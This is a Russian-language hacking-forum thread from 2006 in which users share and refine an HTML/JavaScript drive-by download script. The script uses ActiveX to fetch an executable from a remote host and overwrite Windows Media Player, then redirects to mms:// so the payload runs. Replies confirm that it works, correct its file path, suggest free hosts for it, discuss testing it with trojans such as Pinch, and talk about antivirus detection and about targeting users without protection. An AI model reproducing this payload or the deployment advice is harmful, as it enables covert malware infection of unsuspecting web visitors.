HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ПРОГРАММИРОВАНИЕ > PHP
Перезагрузить страницу Html скрипт загрузки вируса на удалёный комп!
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Html скрипт загрузки вируса на удалёный комп!
  #1  
Старый 27.04.2006, 04:29
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию Html скрипт загрузки вируса на удалёный комп!
Незнаю, может кто-то такое и выкладывал... По моему скрипт просто золотой =) Я его стырил с сайта, куда он был встроен...

<script language="javascript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://www.cup-of-coffee.pnz.ru/upload/bin.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);
location.href = "mms://";
</script>

Незнаю, правильно я его вырезал, или нет... Проверять нехочу =) По адрессу http://www.cup-of-coffee.pnz.ru/upload/bin.exe ничего нет, ну всёравно на свой менять будем! И адресс в Program Files странно прописан, но в таком состоянии он был на сайте... Как он действует =) Через ActiveX загружается файл, (в нашем случаи http://www.cup-of-coffee.pnz.ru/upload/bin.exe) и заменяется на C:\Program Files\Windows Media Player\wmplayer.exe тоесть вместо Windows Media Player! Потом нас кидает на mms:// а это ссылка на медиа файл, и автоматически запускается Windows Media Player, который находится по адрессу C:\Program Files\Windows Media Player\wmplayer.exe где уже вместо него лежит наш вирус

По моему офигительный скрипт!
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 27.04.2006, 04:38
Desr0w
Постоянный
Регистрация: 01.02.2006
Сообщений: 523
С нами: 10669286

Репутация: 319


По умолчанию
Thx пробну
 
Ответить с цитированием

  #3  
Старый 27.04.2006, 05:43
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию
Я в шоке!!! ОН РАБОТАЕТ!!! И путь реально надо указывать C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe всмысле 4 палки, и он загружается! Вот это да...
<offtopic>
Мне кажеться, или сейчас будет эпидемия пинча, ксинча и всякой другой заразы
</offtopic>
Последний раз редактировалось Ponchik; 27.04.2006 в 05:55..
 
Ответить с цитированием

  #4  
Старый 27.04.2006, 11:51
Хозяин
Постоянный
Регистрация: 15.03.2006
Сообщений: 600
С нами: 10608806

Репутация: 1203


По умолчанию
Ponchik, не мог бы ты по-подпробнее объяснить ... что-то у меня не выходит ...
Подвесил скрипт (заменив "http://www.cup-of-coffee.pnz.ru/upload/bin.exe" на ссылку со своими трояном)
Тестировал на себе ... (трой рабочий на 100%)
WM не запускается, трой не срабатывает ...
(вешал на народе)
 
Ответить с цитированием

  #5  
Старый 27.04.2006, 12:22
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
С нами: 11325926

Репутация: 648


По умолчанию
скрипт палиться Касперским

Цитата:
(вешал на народе)
повесь на jino-net.ru
__________________
+ (это не крестик, это плюсик!)
__________________
 
Ответить с цитированием

  #6  
Старый 27.04.2006, 12:33
vectorg
Постоянный
Регистрация: 07.08.2005
Сообщений: 386
С нами: 10925666

Репутация: 454
По умолчанию
пример работы скрипта был уже на видео -> http://video.antichat.ru/file179.html
 
Ответить с цитированием

  #7  
Старый 27.04.2006, 15:29
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
С нами: 10892546

Репутация: 2274


По умолчанию
VectorG, Эх... Ну всёавно многие люди невидели то видео... Такчто надеюсь от темы будет польза...
Посмторел видео... Можно тестить другим способом, никаких свойств рабочего стола ненадо! Просто создать HTML файл, сайт необязательно jino-net.ru я на локалхосте делал. А путь можно изменить на C:////test.exe
В итоге у вас будет файл с сайта на диске C:/ и откроется Windows Media Player
==================================================
AciD_FreaK, ну ты сделай как я сказал, не спросисывай сразу в Program Files, а на диск C:/ и может версия IE не подходит...
==================================================
censored!, покажи хоть что-то что не палится каспеским =))))) В сетях на всех компах один IP, поэтому троянсие проги немогут их просканировать, тоесть у тех юзверей не бывает вирусов, из чего следует что у них нет антивирусов! Можно на каком-то сайте какой-то трой подсунуть, например ксинч
 
Ответить с цитированием

  #8  
Старый 27.04.2006, 15:37
nerezus
Флудер
Регистрация: 12.08.2004
Сообщений: 3,791
С нами: 11444066

Репутация: 2290


По умолчанию
Цитата:
покажи хоть что-то что не палится каспеским =)))))
если покажет - то оно начнет палиться )
 
Ответить с цитированием

  #9  
Старый 27.04.2006, 16:44
censored!
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
С нами: 11325926

Репутация: 648


По умолчанию
Цитата:
AciD_FreaK
На Народе может не запахать, так как Народ не отдает свои файлы и изображения другим сайтам. Поэтому и пробуй Jino-Net.

Цитата:
censored!, покажи хоть что-то что не палится каспеским
После очередного обновления БД антивиря сам найдешь на своем компе. Там этого полно! =)
__________________
+ (это не крестик, это плюсик!)
__________________
 
Ответить с цитированием

  #10  
Старый 27.04.2006, 16:49
Музыкант ♪♫
Новичок
Регистрация: 26.04.2006
Сообщений: 11
С нами: 10548023

Репутация: 10
По умолчанию
Цитата:
Html скрипт
хаха.
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Что-то типа статьи по Html. Allen Болталка 8 03.03.2006 21:38
ВХОДЛ В ЧУЖЕЙ КОМП azeri_hacker Болталка 4 24.05.2005 19:55



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.